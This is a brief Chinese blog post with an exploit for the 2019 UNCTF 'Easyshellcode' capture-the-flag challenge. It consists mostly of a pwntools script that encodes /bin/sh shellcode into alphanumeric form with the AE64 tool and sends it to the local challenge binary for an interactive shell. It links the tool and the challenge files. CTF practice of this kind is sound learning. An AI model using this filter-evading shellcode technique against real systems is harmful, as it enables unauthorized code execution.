2019UNCTF

Easyshellcode:

不说了,都是没有工具的血泪史,直接上exp:

from pwn import *
from numbers import *
from ae64 import AE64
context.log_level = 'debug'

p = process('./pwn')
p.recvuntil('say?\n')
obj = AE64()
sc = obj.encode(asm(shellcraft.sh()))
p.sendline(sc)
p.interactive()

工具连接:https://github.com/veritas501/ae64

题目附件:https://github.com/countfatcode/countfatcode.github.io/tree/master/%E9%A2%98%E7%9B%AE/2019UNCTF/easyshellcode

posted @ 2019-11-12 09:10  countfatcode  阅读(445)  评论(0编辑  收藏  举报